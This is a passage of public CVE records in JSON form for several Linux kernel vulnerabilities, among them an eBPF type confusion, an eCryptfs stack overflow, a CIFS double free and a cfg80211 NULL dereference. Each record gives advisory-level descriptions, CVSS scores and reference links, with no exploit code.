              "value": "This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel 5.14-rc3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of eBPF programs. The issue results from the lack of proper validation of user-supplied eBPF programs, which can result in a type confusion condition. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel. Was ZDI-CAN-14689."
            }
          ]
        },
        "impact": {
          "cvss": {
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-843: Access of Resource Using Incompatible Type (\u0027Type Confusion\u0027)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.zerodayinitiative.com/advisories/ZDI-21-1148/",
              "refsource": "MISC",
              "url": "https://www.zerodayinitiative.com/advisories/ZDI-21-1148/"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220217-0008/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220217-0008/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
    "assignerShortName": "zdi",
    "cveId": "CVE-2021-34866",
    "datePublished": "2022-01-25T15:30:36",
    "dateReserved": "2021-06-17T00:00:00",
    "dateUpdated": "2024-08-04T00:26:54.201Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3630
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel IPsec cookie.c memory leak
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.136Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=fb24771faf72a2fd62b3b6287af3c610c3ec9cf1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211931"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been rated as problematic. This issue affects some unknown processing of the file fs/fscache/cookie.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211931."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.1,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-401 Memory Leak",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-21T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=fb24771faf72a2fd62b3b6287af3c610c3ec9cf1"
        },
        {
          "url": "https://vuldb.com/?id.211931"
        }
      ],
      "title": "Linux Kernel IPsec cookie.c memory leak",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3630",
    "datePublished": "2022-10-21T00:00:00",
    "dateReserved": "2022-10-21T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.136Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-2406
Vulnerability from cvelistv5
Published
2009-07-31 18:29
Modified
2024-08-07 05:52
Severity
Summary
Stack-based buffer overflow in the parse_tag_11_packet function in fs/ecryptfs/keystore.c in the eCryptfs subsystem in the Linux kernel before 2.6.30.4 allows local users to cause a denial of service (system crash) or possibly gain privileges via vectors involving a crafted eCryptfs file, related to not ensuring that the key signature length in a Tag 11 packet is compatible with the key signature buffer size.
References
URLTags
http://www.securityfocus.com/bid/35851vdb-entry, x_refsource_BID
http://secunia.com/advisories/35985third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/36131third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/archive/1/505334/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=6352a29305373ae6196491e6d4669f301e26492ex_refsource_CONFIRM
http://secunia.com/advisories/37471third-party-advisory, x_refsource_SECUNIA
http://risesecurity.org/advisories/RISE-2009002.txtx_refsource_MISC
https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00223.htmlvendor-advisory, x_refsource_FEDORA
http://www.debian.org/security/2009/dsa-1844vendor-advisory, x_refsource_DEBIAN
http://www.ubuntu.com/usn/usn-807-1vendor-advisory, x_refsource_UBUNTU
http://www.vmware.com/security/advisories/VMSA-2009-0016.htmlx_refsource_CONFIRM
http://www.redhat.com/support/errata/RHSA-2009-1193.htmlvendor-advisory, x_refsource_REDHAT
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10072vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8246vdb-entry, signature, x_refsource_OVAL
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.4x_refsource_CONFIRM
http://lists.opensuse.org/opensuse-security-announce/2009-09/msg00001.htmlvendor-advisory, x_refsource_SUSE
https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00166.htmlvendor-advisory, x_refsource_FEDORA
http://www.securityfocus.com/archive/1/507985/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/36051third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/36045third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/36116third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDVSA-2011:029vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/36054third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2009/2041vdb-entry, x_refsource_VUPEN
http://www.debian.org/security/2009/dsa-1845vendor-advisory, x_refsource_DEBIAN
http://www.securitytracker.com/id?1022663vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2009/3316vdb-entry, x_refsource_VUPEN
Impacted products
VendorProduct
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T05:52:14.808Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "35851",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/35851"
          },
          {
            "name": "35985",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/35985"
          },
          {
            "name": "36131",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36131"
          },
          {
            "name": "20090728 [RISE-2009002] Linux eCryptfs parse_tag_11_packet Literal Data Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/505334/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=6352a29305373ae6196491e6d4669f301e26492e"
          },
          {
            "name": "37471",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37471"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://risesecurity.org/advisories/RISE-2009002.txt"
          },
          {
            "name": "FEDORA-2009-8144",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00223.html"
          },
          {
            "name": "DSA-1844",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2009/dsa-1844"
          },
          {
            "name": "USN-807-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/usn-807-1"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
          },
          {
            "name": "RHSA-2009:1193",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/support/errata/RHSA-2009-1193.html"
          },
          {
            "name": "oval:org.mitre.oval:def:10072",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10072"
          },
          {
            "name": "oval:org.mitre.oval:def:8246",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8246"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.4"
          },
          {
            "name": "SUSE-SR:2009:015",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2009-09/msg00001.html"
          },
          {
            "name": "FEDORA-2009-8264",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00166.html"
          },
          {
            "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
          },
          {
            "name": "36051",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36051"
          },
          {
            "name": "36045",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36045"
          },
          {
            "name": "36116",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36116"
          },
          {
            "name": "MDVSA-2011:029",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2011:029"
          },
          {
            "name": "36054",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36054"
          },
          {
            "name": "ADV-2009-2041",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/2041"
          },
          {
            "name": "DSA-1845",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2009/dsa-1845"
          },
          {
            "name": "1022663",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1022663"
          },
          {
            "name": "ADV-2009-3316",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/3316"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-07-29T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Stack-based buffer overflow in the parse_tag_11_packet function in fs/ecryptfs/keystore.c in the eCryptfs subsystem in the Linux kernel before 2.6.30.4 allows local users to cause a denial of service (system crash) or possibly gain privileges via vectors involving a crafted eCryptfs file, related to not ensuring that the key signature length in a Tag 11 packet is compatible with the key signature buffer size."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-10T18:57:01",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "35851",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/35851"
        },
        {
          "name": "35985",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/35985"
        },
        {
          "name": "36131",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36131"
        },
        {
          "name": "20090728 [RISE-2009002] Linux eCryptfs parse_tag_11_packet Literal Data Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/505334/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=6352a29305373ae6196491e6d4669f301e26492e"
        },
        {
          "name": "37471",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37471"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://risesecurity.org/advisories/RISE-2009002.txt"
        },
        {
          "name": "FEDORA-2009-8144",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00223.html"
        },
        {
          "name": "DSA-1844",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2009/dsa-1844"
        },
        {
          "name": "USN-807-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/usn-807-1"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html"
        },
        {
          "name": "RHSA-2009:1193",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://www.redhat.com/support/errata/RHSA-2009-1193.html"
        },
        {
          "name": "oval:org.mitre.oval:def:10072",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10072"
        },
        {
          "name": "oval:org.mitre.oval:def:8246",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8246"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.4"
        },
        {
          "name": "SUSE-SR:2009:015",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2009-09/msg00001.html"
        },
        {
          "name": "FEDORA-2009-8264",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00166.html"
        },
        {
          "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
        },
        {
          "name": "36051",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36051"
        },
        {
          "name": "36045",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36045"
        },
        {
          "name": "36116",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36116"
        },
        {
          "name": "MDVSA-2011:029",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2011:029"
        },
        {
          "name": "36054",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36054"
        },
        {
          "name": "ADV-2009-2041",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/2041"
        },
        {
          "name": "DSA-1845",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2009/dsa-1845"
        },
        {
          "name": "1022663",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1022663"
        },
        {
          "name": "ADV-2009-3316",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/3316"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2009-2406",
    "datePublished": "2009-07-31T18:29:00",
    "dateReserved": "2009-07-09T00:00:00",
    "dateUpdated": "2024-08-07T05:52:14.808Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3595
Vulnerability from cvelistv5
Published
2022-10-18 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel CIFS sess.c sess_free_buffer double free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.263Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=b854b4ee66437e6e1622fda90529c814978cb4ca"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211364"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been rated as problematic. Affected by this issue is the function sess_free_buffer of the file fs/cifs/sess.c of the component CIFS Handler. The manipulation leads to double free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211364."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-415 Double Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-18T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=b854b4ee66437e6e1622fda90529c814978cb4ca"
        },
        {
          "url": "https://vuldb.com/?id.211364"
        }
      ],
      "title": "Linux Kernel CIFS sess.c sess_free_buffer double free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3595",
    "datePublished": "2022-10-18T00:00:00",
    "dateReserved": "2022-10-18T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.263Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-2844
Vulnerability from cvelistv5
Published
2009-08-18 20:41
Modified
2024-08-07 06:07
Severity
Summary
cfg80211 in net/wireless/scan.c in the Linux kernel 2.6.30-rc1 and other versions before 2.6.31-rc6 allows remote attackers to cause a denial of service (crash) via a sequence of beacon frames in which one frame omits an SSID Information Element (IE) and the subsequent frame contains an SSID IE, which triggers a NULL pointer dereference in the cmp_ies function. NOTE: a potential weakness in the is_mesh function was also addressed, but the relevant condition did not exist in the code, so it is not a vulnerability.
Impacted products
VendorProduct
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T06:07:37.259Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "36278",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36278"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://jon.oberheide.org/files/cfg80211-remote-dos.c"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commitdiff%3Bh=cd3468bad96c00b5a512f551674f36776129520e"
          },
          {
            "name": "[oss-security] 20090817 Re: CVE request: kernel: cfg80211: missing NULL pointer checks",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2009/08/17/2"
          },
          {
            "name": "[oss-security] 20090817 CVE request: kernel: cfg80211: missing NULL pointer checks",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2009/08/17/1"
          },
          {
            "name": "36052",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/36052"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.5"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-07-29T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "cfg80211 in net/wireless/scan.c in the Linux kernel 2.6.30-rc1 and other versions before 2.6.31-rc6 allows remote attackers to cause a denial of service (crash) via a sequence of beacon frames in which one frame omits an SSID Information Element (IE) and the subsequent frame contains an SSID IE, which triggers a NULL pointer dereference in the cmp_ies function.  NOTE: a potential weakness in the is_mesh function was also addressed, but the relevant condition did not exist in the code, so it is not a vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2009-08-29T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "36278",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36278"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://jon.oberheide.org/files/cfg80211-remote-dos.c"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commitdiff%3Bh=cd3468bad96c00b5a512f551674f36776129520e"
        },
        {
          "name": "[oss-security] 20090817 Re: CVE request: kernel: cfg80211: missing NULL pointer checks",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2009/08/17/2"
        },
        {
          "name": "[oss-security] 20090817 CVE request: kernel: cfg80211: missing NULL pointer checks",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2009/08/17/1"
        },
        {
          "name": "36052",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/36052"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.5"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2009-2844",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "cfg80211 in net/wireless/scan.c in the Linux kernel 2.6.30-rc1 and other versions before 2.6.31-rc6 allows remote attackers to cause a denial of service (crash) via a sequence of beacon frames in which one frame omits an SSID Information Element (IE) and the subsequent frame contains an SSID IE, which triggers a NULL pointer dereference in the cmp_ies function.  NOTE: a potential weakness in the is_mesh function was also addressed, but the relevant condition did not exist in the code, so it is not a vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "36278",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36278"
            },
            {
              "name": "http://jon.oberheide.org/files/cfg80211-remote-dos.c",
              "refsource": "MISC",
              "url": "http://jon.oberheide.org/files/cfg80211-remote-dos.c"
            },
            {
              "name": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=cd3468bad96c00b5a512f551674f36776129520e",
              "refsource": "CONFIRM",
              "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=cd3468bad96c00b5a512f551674f36776129520e"
            },
            {
              "name": "[oss-security] 20090817 Re: CVE request: kernel: cfg80211: missing NULL pointer checks",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2009/08/17/2"
            },
            {
              "name": "[oss-security] 20090817 CVE request: kernel: cfg80211: missing NULL pointer checks",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2009/08/17/1"
            },
            {
              "name": "36052",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/36052"
            },
            {
              "name": "http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.5",
              "refsource": "CONFIRM",
              "url": "http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.30.5"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2009-2844",
    "datePublished": "2009-08-18T20:41:00",
    "dateReserved": "2009-08-18T00:00:00",
    "dateUpdated": "2024-08-07T06:07:37.259Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-5391
Vulnerability from cvelistv5
Published
2018-09-06 21:00
Modified
2024-08-05 05:33
Severity
Summary
The Linux kernel, versions 3.9+, IP implementation is vulnerable to denial of service conditions with low rates of specially modified packets
References
URLTags
https://access.redhat.com/errata/RHSA-2018:3540vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2018:2785vendor-advisory, x_refsource_REDHAT
